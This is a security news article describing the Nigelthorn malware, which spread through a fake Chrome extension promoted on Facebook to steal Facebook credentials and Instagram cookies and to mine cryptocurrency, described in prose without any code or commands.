New Nigelthorn Malware Steals Facebook Credentials & Mines Digital Money

A new strain of precarious malware named Nigelthorn malware has already infected more than 100,000 computers in 100 countries by abusing a Chrome extension known as Nigelify. The most affected countries by this dangerous malware are Venezuela, Philippines and Ecuador. This new computer virus has the ability to steal login credentials of Facebook accounts on victim’s machine, leads to click fraud, mining cryptocurrency and other malicious activities. According to the cyber security researchers, the racketeers responsible for Nigelthorn malware attack has been active since March 2018.

Security investigators have found that the threat is propagated through malicious links promoted on Facebook and targeted system users are also redirected to a bogus YouTube web page which asks the system users to download and install a Google Chrome extension in order to play the opened video. When the victimized users accepted the installation of an extension, the harmful payload of Nigelthorn malware gets inside the user’s machine and then started its malicious activities onto the system. By using the Google Chrome browser, Nigelthorn malware is especially programmed by the cyber criminals to target both Windows and Linux operating system.

Nigelthorn Malware

After clicking the option displayed ‘Add Extension’, the victimized users get redirected to the Bitly URL which then reroute them to Facebook in order to lure affected users into providing their Facebook login credentials. What’s more, criminal hackers behind Nigelthorn malware used the copycat version of some legitimate Chrome extensions and added a short, but obfuscated harmful script onto them. Once the malicious browser extension associated with Nigelthorn malware gets installed on your system, a malicious JavaScript is executed in order to start the vicious attack just by downloading the configuration of this malware through Command & Control server.

After that, Nigelthorn malware deploys the set of requests onto the affected machine. However, the threat has the ability to steal cookies of Instagram and login credentials of Facebook. Additionally, this precarious cyber infection redirects the compromised PC users to a Facebook API in order to generate an access token which is then delivered to the hacker’s Command and Control server. As a result, the Nigelthorn malware spreads using the credentials stolen from victim’s machine. After that, the hackers distributed the malicious links through messages to the victim’s Facebook friend or publish a new post that consists tags for almost 50 contacts.

Also Read: Cryptocurrency Mining Malware Can Lead Users in Trouble This Year

Moreover, Nigelthorn malware can download a cryptocurrency mining software onto the victim’s machine to mine digital money using affected system’s resources. To control the mining tool, the malicious JavaScript code is downloaded by the malware from external domains. Based on the recent researcher report, the threat actors are trying to mine three popular cryptocurrency named Bitcoin, Monero and Electroneum by using ‘CryptoNight’ algorithm which allows mining the virtual currency from any CPU. In addition to that, Nigelthorn malware also downloads fake YouTube plug-in to receive payments from YouTube and remain for a longer time onto the affected machine without being noticed the presence of Nigelthorn malware.

Leave a Comment

Your email address will not be published. Required fields are marked *